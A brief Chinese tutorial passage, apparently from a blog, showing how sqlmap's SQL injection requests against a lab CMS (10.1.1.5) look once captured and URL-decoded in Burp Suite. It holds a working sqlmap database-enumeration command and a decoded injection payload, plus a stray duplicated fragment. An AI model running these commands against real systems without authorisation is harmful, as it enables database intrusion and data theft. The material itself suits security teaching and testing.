以 cms 为例
sqlmap -u "http://10.1.1.5/cms/show.php?id=33" -dbs --batch --proxy http://127.0.0.1:8080
burpsuite 拦截历史
进行 url 解码
GET /cms/show.php?id=(SELECT CONCAT(0x71626b6b71,(ELT(6317=6317,1)),0x716b717671)) HTTP/1.1
1)) HTTP/1.1
![image-20231121114942955](https://img-blog.csdnimg.cn/img_convert/7be56c3a4dd77a5bac4ff331b605a54e.png)